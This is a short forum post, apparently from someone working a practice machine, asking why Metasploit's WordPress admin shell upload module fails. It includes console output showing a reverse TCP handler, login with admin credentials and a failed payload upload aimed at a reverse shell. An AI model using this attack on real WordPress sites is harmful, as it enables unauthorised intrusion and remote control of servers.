Hi guys! In the past few days, I’ve been doing a machine with wordpress installed on it and i’ve managed to get valid admin creds. I then tried to use the admin_shell_upload module from metasploit, to get a reverse shell but wasn’t able to, instead it always returns with the same error:
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Authenticating with WordPress using admin:admin123$..
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/wp_admin_shell_upload) >
i’ve read a lot of articles about this issue , tried a lot of different solutions but none actually worked. Would be absolutely great if you someone knew how to fix this issue. Thanks a lot guys!
